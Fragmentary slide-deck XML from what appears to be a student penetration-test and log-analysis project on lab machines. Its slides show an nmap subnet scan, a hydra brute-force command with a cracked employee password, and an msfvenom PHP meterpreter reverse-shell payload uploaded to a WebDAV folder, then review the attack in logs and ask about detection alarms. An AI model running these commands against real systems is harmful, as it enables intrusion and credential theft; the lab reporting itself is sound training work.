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 Thin"/>
      <p:regular r:id="rId37"/>
      <p:bold r:id="rId38"/>
      <p:italic r:id="rId39"/>
      <p:boldItalic r:id="rId40"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black"/>
      <p:bold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Quattrocento Sans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9" roundtripDataSignature="AMtx7mjBKzg3ASXOkqK530yNT3zs5R6F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B96FAF-E575-4579-8DD4-3BD0F1172A7B}">
  <a:tblStyle styleId="{20B96FAF-E575-4579-8DD4-3BD0F1172A7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Italic.fntdata"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-boldItalic.fntdata"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-bold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Thin-regular.fntdata"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide30.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-italic.fntdata"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin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attrocentoSans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QuattrocentoSans-italic.fntdata"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/QuattrocentoSans-bold.fntdata"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5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4.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/QuattrocentoSans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6.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-bold.fntdata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2a2e5628f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12a2e5628f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2a2e5628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2a2e5628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270aa5e637_2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g1270aa5e637_2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2a2e5628f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2a2e5628f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270aa5e637_2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g1270aa5e637_2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2a2e5628f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2a2e5628f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6" name="Google Shape;12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3" name="Google Shape;12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3" name="Google Shape;12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270aa5e637_2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g1270aa5e637_2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9" name="Google Shape;12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8" name="Google Shape;1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7" name="Google Shape;12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Google Shape;13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8" name="Google Shape;13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6" name="Google Shape;132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4" name="Google Shape;133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2a2e5628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2a2e5628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45.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57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56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59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75.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74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image" Target="../media/image69.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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89.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87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103.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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86" name="Google Shape;8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88" name="Google Shape;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b="0" l="209" r="207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 b="0" l="504" r="502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4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4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4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4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="236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3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="463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4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="463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 rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="463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 rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="236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58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3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="463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4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="463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5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="463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6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="463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5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5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5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5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5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 rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="236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5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="236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118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 rotWithShape="1">
          <a:blip r:embed="rId4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5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1388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 rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2891" l="0" r="0" t="288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 rotWithShape="1">
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2891" l="0" r="0" t="288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6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 rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1274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4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1274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/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1274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6"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1274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7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6"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8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4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5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6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0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0"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1274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0"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1274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0"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1274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6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1274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7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1274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8">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1274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9">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1274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6" name="Google Shape;56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0" name="Google Shape;60;p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6" name="Google Shape;6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9" name="Google Shape;69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6" name="Google Shape;7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9" name="Google Shape;79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192.168.1.105/company_folders/secre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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image120.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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192.168.1.105/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.105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192.168.1.105/server-status" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.105/server-statu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Johnny’s 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Exploitation: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Numerous Open Ports (Lack of Principle of Least Privileges)</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1119" name="Google Shape;1119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20" name="Google Shape;1120;p9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9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used the NMAP Command: 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nmap -sT -sV 192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="10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5" name="Google Shape;1125;p9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6" name="Google Shape;1126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" name="Google Shape;1128;p9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Running this command allowed us to find all 4 VMs on the network plus any of their corresponding ports that were open for exploitation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0" name="Google Shape;1130;p9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1" name="Google Shape;1131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3" name="Google Shape;1133;p9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9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nmap -sT -sV 192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="11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2a2e5628fa_0_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Exploitation: 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Numerous Open Ports (Lack of Principle of Least Privileges) </a:t>
            </a:r>
            <a:r>
              <a:rPr i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cont.</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140" name="Google Shape;1140;g12a2e5628fa_0_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Image</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1141" name="Google Shape;1141;g12a2e5628fa_0_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12a2e5628fa_0_9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ports scanned w nmap</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1143" name="Google Shape;1143;g12a2e5628fa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825" y="1560000"/>
            <a:ext cx="6003250" cy="340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Brute force attack (password cracking)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1149" name="Google Shape;1149;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275" y="1480575"/>
            <a:ext cx="2428500" cy="2883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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480625"/>
            <a:ext cx="23715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used the Kali Tool -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0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hydra</a:t>
            </a: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command </a:t>
            </a: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crack an employee’s password.</a:t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1" name="Google Shape;1151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2" name="Google Shape;1152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3" name="Google Shape;1153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4" name="Google Shape;1154;p1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5" name="Google Shape;1155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6" name="Google Shape;1156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7" name="Google Shape;1157;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3524550" y="1480575"/>
            <a:ext cx="2428500" cy="2883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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1480625"/>
            <a:ext cx="24285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attack allowed our team to gain direct access to the employee, Ashton’s,  login credentials. Utilizing Ashton’s credentials, the team discovered the CEO, Ryan’s, password hash embedded in a .txt file. The team was able to decrypt Ryan’s password hash and utilize the credentials to gain access to his account.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9" name="Google Shape;1159;p1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0" name="Google Shape;1160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2" name="Google Shape;1162;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6381825" y="1480575"/>
            <a:ext cx="2428500" cy="2883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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324825" y="1273875"/>
            <a:ext cx="23715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Commands</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="11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hydra -l ashton -P rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="11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a2e5628fa_0_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Exploitation: Brute force attack (password cracking) </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cont.</a:t>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1169" name="Google Shape;1169;g12a2e5628fa_0_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Image</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1170" name="Google Shape;1170;g12a2e5628fa_0_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g12a2e5628fa_0_0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 force extracted Ashtons password: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EB5757"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EB5757"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eopoldo</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="EB5757"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1172" name="Google Shape;1172;g12a2e5628f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25" y="1623900"/>
            <a:ext cx="8833952" cy="241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270aa5e637_24_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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation: Direct Open Access to VSI Server Directories</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1178" name="Google Shape;1178;g1270aa5e637_24_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9" name="Google Shape;1179;g1270aa5e637_24_23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275" y="1480575"/>
            <a:ext cx="2428500" cy="2533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g1270aa5e637_24_23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480625"/>
            <a:ext cx="23715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previous exploit where we gained access to one of the employee’s login credentials we then were able to login to the “secret folder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1" name="Google Shape;1181;g1270aa5e637_24_23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887902"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1182" name="Google Shape;1182;g1270aa5e637_24_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3" name="Google Shape;1183;g1270aa5e637_24_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4" name="Google Shape;1184;g1270aa5e637_24_23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887902"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1185" name="Google Shape;1185;g1270aa5e637_24_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g1270aa5e637_24_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g1270aa5e637_24_23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3496050" y="1481375"/>
            <a:ext cx="2428500" cy="2533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g1270aa5e637_24_23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1481375"/>
            <a:ext cx="24285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secret folder contained not only the CEO’s MD5 hash to his password but also exact instructions on where and how to login to the webdav folder, </a:t>
            </a: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 the reverse TCP attack was carried out.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9" name="Google Shape;1189;g1270aa5e637_24_23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888652"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1190" name="Google Shape;1190;g1270aa5e637_24_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1" name="Google Shape;1191;g1270aa5e637_24_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2" name="Google Shape;1192;g1270aa5e637_24_23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401175" y="1481325"/>
            <a:ext cx="2428500" cy="2533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g1270aa5e637_24_23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1481375"/>
            <a:ext cx="23715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Commands</a:t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http://192.168.1.105/company_folders/secret</a:t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2a2e5628fa_0_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Exploitation: Direct Open Access to VSI Server Directories </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cont.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g12a2e5628fa_0_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Image</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1200" name="Google Shape;1200;g12a2e5628fa_0_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g12a2e5628fa_0_17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Allowed the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>discovery of this location: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EB5757"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dav://192.168.1.105/webdav</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EB5757"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1202" name="Google Shape;1202;g12a2e5628fa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250" y="1805000"/>
            <a:ext cx="7773850" cy="23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270aa5e637_24_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Exploitation: Metasploit msfvenom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8" name="Google Shape;1208;g1270aa5e637_24_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9" name="Google Shape;1209;g1270aa5e637_24_3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275" y="1480575"/>
            <a:ext cx="2428500" cy="252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g1270aa5e637_24_3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="752775" y="1481375"/>
            <a:ext cx="23715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command </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en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msfvenom </a:t>
            </a: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was used to exploit the target machine.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1" name="Google Shape;1211;g1270aa5e637_24_3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457156" y="666914"/>
            <a:ext cx="533372" cy="717492"/>
            <a:chOff x="457200" y="1138932"/>
            <a:chExt cx="695400" cy="935331"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1212" name="Google Shape;1212;g1270aa5e637_24_3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1138932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13" name="Google Shape;1213;g1270aa5e637_24_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4" name="Google Shape;1214;g1270aa5e637_24_3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="666889"/>
            <a:ext cx="533372" cy="754493"/>
            <a:chOff x="457200" y="1090699"/>
            <a:chExt cx="695400" cy="983564"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1215" name="Google Shape;1215;g1270aa5e637_24_3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1090699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16" name="Google Shape;1216;g1270aa5e637_24_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7" name="Google Shape;1217;g1270aa5e637_24_3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3496050" y="1480575"/>
            <a:ext cx="2428500" cy="247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g1270aa5e637_24_3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3548475" y="1439975"/>
            <a:ext cx="24285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Successfully connected and started a meterpreter reverse TCP session, with full access into the target’s OS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9" name="Google Shape;1219;g1270aa5e637_24_3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="667264"/>
            <a:ext cx="533372" cy="754868"/>
            <a:chOff x="457200" y="1090210"/>
            <a:chExt cx="695400" cy="984053"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1220" name="Google Shape;1220;g1270aa5e637_24_3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1090210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1" name="Google Shape;1221;g1270aa5e637_24_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2" name="Google Shape;1222;g1270aa5e637_24_3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401175" y="1481325"/>
            <a:ext cx="2428500" cy="247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g1270aa5e637_24_3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1481374"/>
            <a:ext cx="23715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msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.90 lport=80 &gt;&gt; shell.php</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="11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2a2e5628fa_0_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Exploitation: Metasploit msfvenom </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cont.</a:t>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1229" name="Google Shape;1229;g12a2e5628fa_0_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Images</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1230" name="Google Shape;1230;g12a2e5628fa_0_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g12a2e5628fa_0_2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started listener on attack machine. Then planted reverse shell exploit on server using </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EB5757"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> file and executed. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1232" name="Google Shape;1232;g12a2e5628fa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325" y="1951100"/>
            <a:ext cx="4472976" cy="257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g12a2e5628fa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500" y="1951112"/>
            <a:ext cx="4472974" cy="257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0" name="Google Shape;1240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46" name="Google Shape;1246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7" name="Google Shape;1247;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928225" y="3824150"/>
            <a:ext cx="78678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Port scan occurred </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>May 3, 2022 3:08:40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3 packets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>were sent @</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t> 492 bytes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>each packet from</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t> 192.168.1.90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Port 4444 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>has the most records compared to baseline indicating</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t> this port was being scanned.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1248" name="Google Shape;12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800" y="3985175"/>
            <a:ext cx="552925" cy="4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202" y="1237413"/>
            <a:ext cx="1955850" cy="18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5986" y="706125"/>
            <a:ext cx="6160189" cy="29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6" name="Google Shape;1256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7" name="Google Shape;1257;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-50" y="741300"/>
            <a:ext cx="9144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 for the hidden directory occurred on </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="24292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May 3, 2022 @ 00:00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>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24292F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>38,829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/>
              <a:t>requests were made. However, this number can vary depending on how many times the VSI server was attacked.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key file they were after were </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>instructions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>on how to access the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>webdav directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>to upload a malicious payload.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58" name="Google Shape;12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025" y="1765250"/>
            <a:ext cx="5671937" cy="22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2675" y="4101575"/>
            <a:ext cx="3778626" cy="7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270aa5e637_24_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 (cont)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5" name="Google Shape;1265;g1270aa5e637_24_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266" name="Google Shape;1266;g1270aa5e637_24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238" y="838050"/>
            <a:ext cx="8527524" cy="37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2" name="Google Shape;1272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73" name="Google Shape;1273;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1452400" y="3921688"/>
            <a:ext cx="79146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290,804</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EB5757"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>requests were made in the attack.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5 r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>equests had been made after the attacker discovered the password.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1274" name="Google Shape;12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300" y="4140700"/>
            <a:ext cx="684325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125" y="686100"/>
            <a:ext cx="5703732" cy="32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1" name="Google Shape;1281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82" name="Google Shape;1282;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1408725" y="4242050"/>
            <a:ext cx="7041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223,755 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requests </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>were made to this directory.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Webdav/shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> file was requested.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1283" name="Google Shape;12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798" y="4173925"/>
            <a:ext cx="684327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8725" y="677075"/>
            <a:ext cx="6068301" cy="342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1" name="Google Shape;1291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97" name="Google Shape;1297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98" name="Google Shape;1298;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="160470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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What kind of alarm can be set to detect future unauthorized access?</a:t>
            </a:r>
